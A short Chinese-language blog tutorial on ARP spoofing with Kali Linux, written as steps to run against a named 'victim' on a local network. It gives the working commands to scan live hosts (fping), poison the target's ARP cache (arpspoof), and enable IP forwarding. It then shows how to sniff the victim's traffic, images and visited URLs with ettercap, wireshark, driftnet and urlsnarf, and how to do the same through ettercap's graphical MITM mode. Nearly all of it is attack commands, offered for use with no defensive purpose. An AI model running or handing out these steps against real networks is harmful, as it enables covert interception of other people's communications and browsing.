kail linux arp欺骗

2023-03-12,,

首先连接wifi,进入内网

1,查看内网的存活主机  命令  fping -asg 192.168.1.0/24    (视不同环境而定,假设这里的路由器地址为 192.168.1.1)

也可利用其他工具查看其他主机,方法有很多

2,arp欺骗  命令 arpspoof -i wlan0 -t 192.168.1.2(目标的内网地址) 192.168.1.1

上面一句就对192.168.1.2实施了欺骗 ,此时该主机是断网的

3,流量转发  我们将劫持到的流量通过自己发机器转发到受害人的机器上,让其恢复网络

转发命令  echo 1 >/proc/sys/net/ipv4/ip_forward   将参数换为1

    这时可以启用 wireshark 抓包工具进行抓包

或者直接获取流量包  ettercap -Tq -i wlan0

    获取图片和浏览的网站driftnet -i wlan0        urlsnarf -i wlan0

-------------------------------------------------------------------------------------------------------------

另一种图形化的欺骗方式

ettercap -G  启动图形化的ettercap

先扫描内网用户,然后添加目标ip和192.168.1.1

选择 Mitm arp sniff

完成后启动效果和上面一样

arp欺骗是渗透内网的第一步

kail linux arp欺骗的相关教程结束。

《kail linux arp欺骗.doc》

下载本文的Word格式文档,以方便收藏与打印。